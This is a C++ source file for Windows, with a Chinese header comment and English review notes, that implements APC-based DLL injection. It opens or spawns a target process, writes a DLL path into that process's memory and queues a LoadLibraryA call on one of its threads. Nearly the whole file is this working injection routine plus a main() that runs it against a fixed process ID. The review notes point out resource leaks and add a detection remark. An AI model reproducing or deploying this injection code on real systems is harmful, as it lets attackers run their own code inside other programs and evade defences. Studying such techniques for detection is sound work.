1 #include <iostream>
2 #include <Windows.h>
3 #include <TlHelp32.h>
4
using std::cout;
using std::endl;
6
7 /*
8 APC注入条件:
9 目标线程处于可唤醒状态
10 如使用以下API时就处于可唤醒状态
11 SleepEx, SignalObjectAndWait, WaitForSingleObjectEx, WaitForMultipleObjectsEx,MsgWaitForMultipleObjectsEx
12 参数dwPid默认为0,表示自动创建目标进程并立刻生效注入,否则,注入现有目标,等待目标唤醒时执行APC回调
13 */
/// Queues a LoadLibraryA APC on one thread of the target process so that the
/// target loads dllUrl the next time that thread enters an alertable wait
/// (see the header comment above for which APIs make a thread alertable).
///
/// @param dllUrl NUL-terminated DLL path; copied into the target's address
///               space and passed to LoadLibraryA as the APC argument.
/// @param dwPid  0: a hard-coded executable is started suspended and its
///               primary thread is used. Otherwise: the process with this PID
///               is opened and the first thread the snapshot lists for it is
///               used.
/// @param exeUrl Not read by the current definition.
/// @return TRUE only when QueueUserAPC succeeded; FALSE on any earlier failure.
BOOL APCInject(char *dllUrl,DWORD dwPid=0,char *exeUrl=NULL);
15
int main(void)
{
    // Runs the injection against the author's fixed sample PID / DLL path
    // and prints the BOOL result as 1 or 0.
    const BOOL injected = APCInject("c:\\desktop\\test.dll", 3980);
    cout << injected << endl;
    return 0;
}
22
/// Queues a LoadLibraryA APC on one thread of the target process so that the
/// target loads dllUrl the next time that thread enters an alertable wait.
///
/// @param dllUrl NUL-terminated DLL path; copied into the target's address
///               space and passed to LoadLibraryA as the APC argument.
/// @param dwPid  0: a hard-coded executable is started suspended and its
///               primary thread is used (exeUrl is not consulted).
///               Otherwise: the first thread the snapshot lists for dwPid.
/// @param exeUrl Not read anywhere in this definition.
/// @return TRUE only when QueueUserAPC succeeded; FALSE on any earlier failure.
///
/// NOTE(review): resource handling is incomplete — every early `return FALSE`
/// leaks hPro and/or hThr (and, for dwPid == 0, leaves the suspended child
/// process alive), the dwPid != 0 success path never closes hThr, and the
/// remote buffer hVir is never released in the target.
BOOL APCInject(char *dllUrl,DWORD dwPid,char *exeUrl)
{
    HANDLE hSnap=NULL,hPro=NULL,hThr=NULL;
    BOOL bOk = FALSE;
    LPVOID hVir = NULL;          // remote buffer that receives the dllUrl string
    THREADENTRY32 te = {0};

    if (!dwPid)
    {
        STARTUPINFO wi = {0};
        PROCESS_INFORMATION pi = {0};

        wi.cb = sizeof(wi);
        // Return value is not checked: on failure pi stays zeroed and the
        // `!hThr` test below reports FALSE. exeUrl is ignored in favour of
        // this fixed path.
        CreateProcessA("c:\\desktop\\123.exe",NULL,NULL,NULL,FALSE,CREATE_SUSPENDED,NULL,NULL,&wi,&pi);
        hPro = pi.hProcess;
        hThr = pi.hThread;
    } else {
        te.dwSize = sizeof(te);
        hPro = OpenProcess(PROCESS_ALL_ACCESS,FALSE,dwPid);
        if (!hPro)
            return FALSE;
        // 4 == TH32CS_SNAPTHREAD. A thread snapshot lists threads system-wide,
        // hence the owner-PID filter in the loop. INVALID_HANDLE_VALUE is not
        // checked here; Thread32First then fails and the loop is skipped.
        hSnap = CreateToolhelp32Snapshot(4,dwPid);
        bOk = Thread32First(hSnap,&te);
        while (bOk)
        {
            if (te.th32OwnerProcessID == dwPid)
            {
                // Takes the first thread owned by dwPid, not necessarily one
                // that is in an alertable wait (see the file header), so the
                // queued APC may never execute.
                hThr = OpenThread(THREAD_ALL_ACCESS,FALSE,te.th32ThreadID);
                break;
            }

            bOk = Thread32Next(hSnap,&te);
        }
        CloseHandle(hSnap);
    }

    if (!hThr)
        return FALSE;            // NOTE(review): hPro is leaked here
    hVir = VirtualAllocEx(hPro,NULL,strlen(dllUrl)+1,MEM_COMMIT,PAGE_READWRITE);
    if (!hVir)
        return FALSE;            // NOTE(review): hPro and hThr are leaked here
    if (!WriteProcessMemory(hPro,hVir,dllUrl,strlen(dllUrl)+1,NULL))
        return FALSE;            // NOTE(review): hPro, hThr and the remote buffer are leaked here
    CloseHandle(hPro);           // the process handle is not used past this point
    // GetProcAddress's result is not null-checked before the cast.
    // (DWORD)hVir is a C-style pointer-to-32-bit cast (narrowing on 64-bit
    // builds). Detection note: remote VirtualAllocEx + WriteProcessMemory
    // followed by QueueUserAPC whose routine is LoadLibraryA is the call
    // sequence endpoint telemetry rules for APC injection key on.
    if (QueueUserAPC((PAPCFUNC)GetProcAddress(GetModuleHandle("kernel32.dll"),"LoadLibraryA"),hThr,(DWORD)hVir))
    {
        if (!dwPid)
        {
            // Newly created process: resume the suspended primary thread; per
            // the file header the queued APC takes effect immediately then.
            ResumeThread(hThr);
            CloseHandle(hThr);
        }
        return TRUE;             // NOTE(review): hThr is never closed when dwPid != 0
    }
    CloseHandle(hThr);           // NOTE(review): for dwPid == 0 the child stays suspended
    return FALSE;
}